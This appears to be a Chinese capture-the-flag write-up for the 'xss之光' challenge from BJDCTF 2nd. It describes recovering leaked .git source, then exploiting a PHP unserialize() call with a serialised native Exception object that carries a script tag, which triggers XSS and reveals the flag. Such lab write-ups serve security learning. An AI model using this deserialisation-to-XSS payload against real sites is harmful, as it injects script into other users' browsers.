[BJDCTF 2nd]xss之光

存在.git源码泄露,GitHack得到源码

<?php
    $a = $_GET['yds_is_so_beautiful'];
    echo unserialize($a);

两行代码,根据题目名推测需要弹一个XSS弹窗,题目的代码没有类给我们构造反序列化条件,于是就需要利用php的原生类来进行操作

参考:php可利用的原生类

题目php版本是5.6.40,于是利用Exception类来进行弹窗

$b = new Exception("<script>window.location.href='https://www.baidu.com'</script>");
echo urlencode(serialize($b));

抓包返回头中就有flag